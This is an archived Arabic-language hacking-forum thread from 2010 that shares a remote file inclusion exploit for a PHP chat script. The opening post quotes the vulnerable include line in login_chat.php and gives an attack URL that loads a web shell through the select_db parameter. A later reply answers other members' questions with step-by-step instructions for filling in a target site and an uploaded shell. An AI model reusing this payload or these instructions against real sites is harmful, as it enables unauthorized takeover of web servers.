:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات (http://www.vbspiders.com/vb/forumdisplay.php?f=38)
-   -   ثغرة جديده من هكر عرعر (http://www.vbspiders.com/vb/showthread.php?t=32872)

ViRuS Qalaa 07-21-2010 06:45 AM
ثغرة جديده من هكر عرعر
 
كود PHP:
*# Exploit Title:   php_chat Remote File inclusion Vulnerability  

# Date: 2010/07/20  

# Author: HaCkEr arar  

# Email: [email]y.0@hotmail.de[/email]  

# My Sites : [url]www.vbspiders.com[/url]  

# Script home:  

[url]http://www.opensourcescripts.com/dir/PHP/Chat/php_chat_module_for123_flash_chat_4902.html[/url]  

# Tested on: Windows  

# Team hacker:HaCkEr aRaR & ViRuS Qalaa >>>X-MaN HaCk3r TeaM  

# ViRuS Qalaa: [email]em9@live.com[/email]  

:::::::::::::::::::::::::  

=================Exploit=================  

   

-=[ vuln c0de ]=-  

include('db/'.$select_db.'.php');  

login_chat.php  

Line:41  

   

----exploit----  

   

http://{localhost}/{path}login_chat.php?select_db=shell.txt?  

   

---------greatz----------  

Greatz to :  

ViRuS Qalaa,VoLc4n0,Members [url]www.j1q1.com[/url]  

   

and My friends Others and My friends in MSN  

EnJoY o_O
_____________________________________________________ 

http://www.exploit-db.com/exploits/14425/

BayBi HaCk 07-21-2010 10:50 AM
[motr][motr1]بارك الله فيك يا اخ فايروس يشرفني ان اكون اول من يرد عليك[/motr1][/motr]

z3r0 b0mb3r 07-21-2010 10:58 AM
شكرا وبارك الله فيك

hassn1402 07-21-2010 12:07 PM
كيف الاستغلال

Q2-FOX2R 07-21-2010 12:28 PM
مشكووورين حبيبي

بس اعتقد النوع ده من الثغرات قريب ينقرض ههههههه

بسبب الاصدار الجديد للملقم بي آتش بي

yatta 07-21-2010 04:52 PM
اذا ممكن .. كيف طريقة الاستغلال

ViRuS Qalaa 07-21-2010 05:10 PM
[align=center]اخي طريقة الاستغلال كذا
----
كود PHP:
http://{localhost}/{path}/login_chat.php?select_db=shell.txt? 
اولا رابط الموقع نضعة بدل {localhost}
ثانيا المجلد لي فية السكريب نضعة بدل {path} واذا كان السكريب قي الواجة نمسح هذة
ثالثا الملف والدالة هذة
كود PHP:
/login_chat.php?select_db
رابعا نضع بدل shell.txt شل مرفوع بصيغة txt
خامسا نضع في الاخر علامة استفهام
وتحياتي لكم [/align]

hack!n9 07-22-2010 05:40 PM
مشكور يا غالي عل تغرة بس ماهو دورك


الساعة الآن 05:41 AM


[ vBspiders.Com Network ]